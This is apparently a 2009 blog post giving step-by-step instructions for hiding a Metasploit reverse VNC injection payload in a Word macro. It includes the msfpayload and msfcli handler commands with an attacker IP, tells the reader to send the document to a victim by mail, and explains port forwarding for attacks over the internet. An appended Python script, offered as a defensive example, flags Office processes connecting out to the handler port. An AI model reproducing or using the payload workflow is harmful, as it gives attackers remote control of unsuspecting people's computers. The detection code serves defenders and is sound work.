Sunday, May 24, 2009

Metasploit & Reverse VNC Injection hidden in a Word file - PoC (Proof of Concept)

Hello friends, today I'm going to show how to use the Metasploit v3.2 payload feature for Reverse VNC Injection. The steps are given below.

Let's begin.

1) Create a payload for Reverse VNC Injection with Metasploit's msfpayload utility (the trailing V asks for VBA output):
./msfpayload windows/vncinject/reverse_tcp LHOST=172.16.107.44 V > exploit.bas

2) Copy the exploit.bas file to a Windows system to build the .doc file.
Create a new doc file, write some text into it, then do the following:
go to Tools -> Macro -> Visual Basic Editor,
then go to File -> Import File, choose exploit.bas, and save the document under a name such as NiceGame.doc.
Now the file is ready; send it to the victim by mail or some other way.

3) Now, in Backtrack-4, start the handler with this command:
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=172.16.107.44 DisableCourtesyShell=True E

On the target Windows system, when the victim opens the file, he/she is asked whether or not to run the macro. If it is accepted, the connection is initiated from the victim's machine back to the handler, and the VNC client opens on the Backtrack system.

Note: VNC does not need to be installed on the victim PC. You can also do this over a WAN; the only requirement is that you forward port 4444 on your modem or router, since that is the port the reverse_tcp payload connects back to.
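Because the mechanism above is a Word process opening an outbound TCP connection to the handler (port 4444 by default), the detection counterpart is an Office binary initiating a network connection. The following Python script is an added example, not part of the original post: it scans constructed Sysmon Event ID 3 (NetworkConnect) records and flags Office processes dialing out to the handler port or to any port outside an assumed allowlist of 80/443. The one-line record format, the Office process list and the port lists are assumptions made for this example.

```python
from typing import Dict, List, Optional, Tuple

# Office binaries that should not normally open raw outbound TCP sessions to arbitrary ports (assumption).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Ports an Office process legitimately talks to (web, updates, SharePoint); allowlist assumed for this example.
EXPECTED_PORTS = {80, 443}
# 4444 is the default LPORT of the reverse_tcp payload and of the multi/handler used in the post.
HANDLER_PORTS = {4444}

# Constructed sample Sysmon Event ID 3 (NetworkConnect) records, flattened to one 'key=value|...' line each.
SAMPLE_EVENTS = [
    "EventID=3|Image=C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE|Initiated=true|DestinationIp=172.16.107.44|DestinationPort=4444|Protocol=tcp",
    "EventID=3|Image=C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE|Initiated=true|DestinationIp=10.0.0.5|DestinationPort=443|Protocol=tcp",
    "EventID=3|Image=C:\\Program Files\\Microsoft Office\\Office12\\EXCEL.EXE|Initiated=true|DestinationIp=10.0.0.9|DestinationPort=8080|Protocol=tcp",
    "EventID=3|Image=C:\\Program Files\\Google\\Chrome\\chrome.exe|Initiated=true|DestinationIp=172.16.107.44|DestinationPort=4444|Protocol=tcp",
    "EventID=3|Image=C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE|Initiated=false|DestinationIp=10.0.0.7|DestinationPort=4444|Protocol=tcp",
]

def parse_event(line: str) -> Dict[str, str]:
    """Split a 'key=value|key=value' record into a dict; values keep any '=' after the first."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def classify(event: Dict[str, str]) -> Optional[str]:
    """Return 'high', 'medium' or None for one NetworkConnect event."""
    if event.get("EventID") != "3" or event.get("Protocol", "").lower() != "tcp":
        return None
    image = event.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image not in OFFICE_IMAGES or event.get("Initiated", "").lower() != "true":
        return None  # not an Office process, or not an outbound (initiated) connection
    try:
        port = int(event.get("DestinationPort", ""))
    except ValueError:
        return None
    if port in HANDLER_PORTS:
        return "high"    # Office process dialing out to the Metasploit default handler port
    if port not in EXPECTED_PORTS:
        return "medium"  # Office process dialing out to a port outside the allowlist
    return None

def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (severity, image, 'ip:port') for every event worth alerting on, in input order."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev:
            hits.append((sev, ev["Image"], f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

On the sample data only the WINWORD.EXE connection to 172.16.107.44:4444 rates "high"; the Chrome connection to the same port and the inbound (Initiated=false) event are outside this rule's scope.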

Original video links for the above guide:
http://blip.tv/file/1847504
http://wirelesspunter.blip.tv

1 comment:

Sikadista said...

You should put credits to people, dude!

Just like this:

Credits go to Punter of forum.darkc0de.com